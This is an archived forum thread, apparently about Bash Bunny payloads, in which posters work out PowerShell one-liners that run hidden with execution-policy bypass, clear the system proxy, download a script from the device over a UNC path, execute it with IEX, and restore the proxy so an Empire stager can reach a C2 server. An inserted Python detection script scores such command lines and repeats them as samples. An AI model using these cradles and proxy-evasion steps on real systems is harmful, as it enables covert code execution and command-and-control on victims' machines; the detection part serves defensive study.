Dealing with powershell and proxies in payloads


cyb3rwr3ck

Hi there,

I was wondering how the PowerShell-based Bunny payloads that load PowerShell script files from either the SMB share or the web service of the Bunny could circumvent the system-wide proxy. The problem is that the proxy - obviously - is unable to connect to the Bunny IP and the payload fails. The current versions of the payloads do not seem to take this into account. The expected behaviour should be to ignore the system proxy during the initial request to the Bunny and to use it in all other requests, which is the PowerShell default.

I am currently unaware of a good solution to circumvent a system wide proxy in powershell, especially without local admin.

Any ideas?

Best regards!

F


Have not tried doing network stuff with the bunny with a proxy setting in play.  By default doesn't the proxy only get used for stuff leaving the local network or am I missing something and there is a way to make a machine use the proxy for every kind of network traffic, including local?

If it is the first, I don't think the proxy setting will get in the way of the bunny since the interface for it will come up as a local network (NIC and remote device "Bunny" are on the same subnet).

 

Anyone else wanna correct?  This is all speculation here.


17 hours ago, PoSHMagiC0de said:

By default doesn't the proxy only get used for stuff leaving the local network or am I missing something and there is a way to make a machine use the proxy for every kind of network traffic, including local?

The thing is that the Bunny presents a network to the host during this kind of "bring your own network" attack. So the proxy is utilized as long as there is no "direct" exception for exactly this Bunny network configuration. This will create a CONNECT request to the explicit proxy, which dies...

The only thing that should fix this behavior is enforcing this kind of direct request which - in an enterprise setup - is usually done by pac files. I have no idea how to do it temporarily using powershell so this is the goal to achieve.


Yeah, that is a tough one.  I do not have a setup to test that but I know PowerShell has a method to bypass the proxy.

Try these 2 ways.  Both are PowerShell.

# If you use Invoke-WebRequest
Invoke-WebRequest -Uri "Bashbunny uri" -NoProxy

# If using the old-school WebClient. Use before making the request.
[System.Net.GlobalProxySelection]::Select = [System.Net.GlobalProxySelection]::GetEmptyWebProxy()

 

Do not know if these will work but worth a try.

 


4 weeks later...
On 1/16/2018 at 12:17 AM, PoSHMagiC0de said:

Try these 2 ways.  Both are Powershell.

Alright, had some time to check this out during the weekend.

Invoke-WebRequest: The -NoProxy option seems to be part of PS >= v6, so it's not reliably to be found on the victim in any way.

This is how it should look if we want to first check a SMB share for connectivity and then download/execute a payload from it without using the system-wide proxy in case of PS >= v6:

powershell -exec Bypass -noP -WindowStyle Hidden "while ($true) {If ((New-Object net.sockets.tcpclient('<HOST_IN_HERE>','445')).Connected) {IEX (Invoke-WebRequest -UseBasicParsing -Uri '\\<HOST_IN_HERE>\p.txt' -NoProxy);exit}}"

Right now only this one is working reliably (PS < v6, proxy settings are applied):

powershell -exec Bypass -noP -WindowStyle Hidden "while ($true) {If ((New-Object net.sockets.tcpclient('<HOST_IN_HERE>','445')).Connected) {IEX (Invoke-WebRequest -UseBasicParsing -Uri '\\<HOST_IN_HERE>\p.txt');exit}}"

The most portable, working solution to circumvent the proxy would be the following one. Of course it's way too long to fit into a WIN+R call, so it must be QUACKED to cmd or called from disk.

powershell -exec Bypass -noP -WindowStyle Hidden "while ($true) {If ((New-Object net.sockets.tcpclient('<HOST_IN_HERE>','445')).Connected) {[System.Net.GlobalProxySelection]::Select = [System.Net.GlobalProxySelection]::GetEmptyWebProxy(); IEX (New-Object System.Net.WebClient).DownloadString('\\<HOST_IN_HERE>\p.txt');exit}}"

 

I have tested this stuff using an Empire stager. One open point is that the stager is also called without proxy settings which will obviously break the attack in a restrictive environment where we want to retrieve the payload from the BB and reach out to the Internet to our C2 Server using the explicit proxy. To me this is kind of strange because the stager does the proxy resolving stuff on its own. 

So, the new question is: How to reset the proxy settings to the system settings after retrieving the file from the BB. System.Net.GlobalProxySelection does not offer such a method.


And this is it (works, according to a quick test):

powershell -exec Bypass -noP "while ($true) {If ((New-Object net.sockets.tcpclient('<HOST_IN_HERE>','445')).Connected) {$p = [System.Net.WebProxy]::GetDefaultProxy(); $p.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials; [System.Net.GlobalProxySelection]::Select = [System.Net.GlobalProxySelection]::GetEmptyWebProxy(); $w=(New-Object System.Net.WebClient).DownloadString('\\<BB_IN_HERE>\p.txt'); [System.Net.GlobalProxySelection]::Select = $p; IEX $w;exit}}"

  1. Store the default proxy + creds in $p
  2. Clear the proxy
  3. Retrieve the script from the BB into $w
  4. Select the proxy settings from $p
  5. Run the script with the selected proxy settings
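From a detection standpoint, the command lines in this thread share a stable shape: a TCP probe loop, a proxy override through GlobalProxySelection, a download from a UNC path and an IEX. The following Python is an added example, not part of the thread, that scores constructed process-creation command lines (Sysmon Event ID 1 / Security 4688 CommandLine fields) on those indicators; the 172.16.64.1 address, the event fields and the weights are assumptions.

```python
import re

# Added detection example: constructed process-creation events (CommandLine field of
# Sysmon Event ID 1 / Security 4688). Events 4120 and 6001 mirror the thread's one-liners
# with a constructed Bunny-side address; 5208 and 6100 are benign look-alikes.
SAMPLE_EVENTS = [
    {"pid": 4120, "parent": "explorer.exe", "cmd": r'''powershell -exec Bypass -noP -WindowStyle Hidden "while ($true) {If ((New-Object net.sockets.tcpclient('172.16.64.1','445')).Connected) {[System.Net.GlobalProxySelection]::Select = [System.Net.GlobalProxySelection]::GetEmptyWebProxy(); IEX (New-Object System.Net.WebClient).DownloadString('\\172.16.64.1\p.txt');exit}}"'''},
    {"pid": 5208, "parent": "svchost.exe", "cmd": r'''powershell.exe -NoProfile -Command "Get-Process | Out-File C:\temp\procs.txt"'''},
    {"pid": 6001, "parent": "cmd.exe", "cmd": r'''powershell -exec Bypass -noP "$p=[System.Net.WebProxy]::GetDefaultProxy(); [System.Net.GlobalProxySelection]::Select=[System.Net.GlobalProxySelection]::GetEmptyWebProxy(); $w=(New-Object System.Net.WebClient).DownloadString('\\172.16.64.1\p.txt'); [System.Net.GlobalProxySelection]::Select=$p; IEX $w"'''},
    {"pid": 6100, "parent": "explorer.exe", "cmd": r'''powershell -NoProfile "[System.Net.WebProxy]::GetDefaultProxy().Address"'''},
]

# Each indicator is one observable from the thread's technique; the weights are illustrative.
INDICATORS = {
    "proxy_override": (3, re.compile(r"GlobalProxySelection\]::(?:Select|GetEmptyWebProxy)|WebProxy\]::GetDefaultProxy|-NoProxy\b", re.I)),
    "download_cradle": (2, re.compile(r"DownloadString|Invoke-WebRequest|\biwr\b|Net\.WebClient", re.I)),
    "unc_ip_source": (2, re.compile(r"\\\\\d{1,3}(?:\.\d{1,3}){3}\\")),
    "invoke_expression": (2, re.compile(r"\bIEX\b|Invoke-Expression", re.I)),
    "tcp_probe_loop": (2, re.compile(r"while\s*\(\$true\).*tcpclient", re.I | re.S)),
    "exec_bypass": (1, re.compile(r"-exec(?:utionpolicy)?\s+bypass|-noP\b", re.I)),
    "hidden_window": (1, re.compile(r"-windowstyle\s+hidden", re.I)),
}

def classify(cmd):
    """Return the indicators a command line matches, a weighted score and an alert flag.
    Alert only when proxy manipulation co-occurs with a download cradle or IEX: merely
    reading the default proxy (event 6100) is ordinary administrative activity."""
    found = {name for name, (_, rx) in INDICATORS.items() if rx.search(cmd)}
    score = sum(INDICATORS[name][0] for name in found)
    alert = "proxy_override" in found and bool(found & {"download_cradle", "invoke_expression"})
    return {"indicators": found, "score": score, "alert": alert}

def scan(events):
    """Run classify over process events and return the alerting ones, highest score first."""
    hits = []
    for ev in events:
        verdict = classify(ev["cmd"])
        if verdict["alert"]:
            hits.append({"pid": ev["pid"], "parent": ev["parent"], **verdict})
    return sorted(hits, key=lambda h: h["score"], reverse=True)

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(f"pid={hit['pid']} parent={hit['parent']} score={hit['score']} "
              f"indicators={sorted(hit['indicators'])}")
```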

Or, if you are running something that uses SMB on the Bunny to exfiltrate, you might want to leave the proxy settings off until the script is done and then turn them back on.

Hmm, @NightStalker has a payload called Proxy Interceptor that I just rewrote but ran into a snag.  Proxy settings were being set via registry entries.  I wonder if these .NET classes work the same, as I noticed that when set in the registry, it takes some time for the setting to kick in versus using the GUI.

At the same time, for your use, you might check if there is a proxy first before going through the motions, though that will make the one-liner longer.


Archived

This topic is now archived and is closed to further replies.
